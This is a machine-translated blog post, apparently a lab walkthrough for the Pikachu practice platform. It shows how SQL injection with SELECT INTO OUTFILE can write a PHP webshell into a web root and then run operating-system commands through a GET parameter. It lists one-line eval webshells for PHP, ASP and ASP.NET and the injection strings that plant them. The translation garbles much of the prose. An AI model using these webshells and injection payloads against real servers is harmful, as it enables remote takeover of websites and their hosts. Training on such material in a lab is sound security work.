Injection -OS remote control test platform based on SQL Pikachu

Others 2020-03-19 17:44:55 views: null

Trojan sentence

Is a short and lean Trojan client, we use various functions to execute code inside the language provided by, or used to perform the functions of the operating system commands to construct a simple Trojan horse program, which means we can this function is written directly to the file inside, through access to the file to perform this function, the function to go inside pass operation corresponding to what we want, because the function itself is used to execute operating system commands, some content will be operating as a remote control to perform. Good for hiding, and powerful
PHP:; <PHP @eval ($ _ POST [ 'Chopper'])??>
ASP: <% eval Request ( "Chopper")%>
ASP.NET:<%@ Page Language = " Jscript "%> <% eval ( Request.Item [" chopper "]," unsafe ");%>

Injection vulnerability through SQL, write malicious code to
select 1, 2 into outfile "/var/www/html/1.txt"
1.txt result of select into outfile will write to the specified directory
does not echo in some injection You can use into outfile writes the results to the specified file, and then get access
Prerequisites:
1. need to know remote directory
2. the need for remote directory has write permissions
3. need to open a database secure_file_priv (new version mysql features turned off by default, is can not use into outfile to write something)

Look in the database about the
show global variables like '% secure% ';
we can see, secure_file_priv default is none we want to change it to empty, need to modify the my.cnf file, the secure_file_priv = null added, and then restart the database service
then there is / var / www / html directory permissions we need to write
and then we construct payload
k 'of Union the SELECT "<? PHP @eval ($ _ GET [' the Test '])?>", 2 INTO outfile "/ var / www / html / 1.php "#
and then submit, we do not see what the front is actually echoed
and then we cut to the server to see if the file has not yet been written into

K 'Union SELECT "<? php System (the GET $ _ [' cmd '])?>", 2 INTO outfile "/var/www/html/2.php"#
System php following function is used to execute operating system commands we can pass via GET parameters entered,
and then we visit IP / 2.php? cmd = ifconfig found that he would pass over card information

Son of Spring fourteen
Published 13 original articles · won praise 1 · views 252
Private letter concerns

Guess you like

Origin blog.csdn.net/qq_43499389/article/details/104970500
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com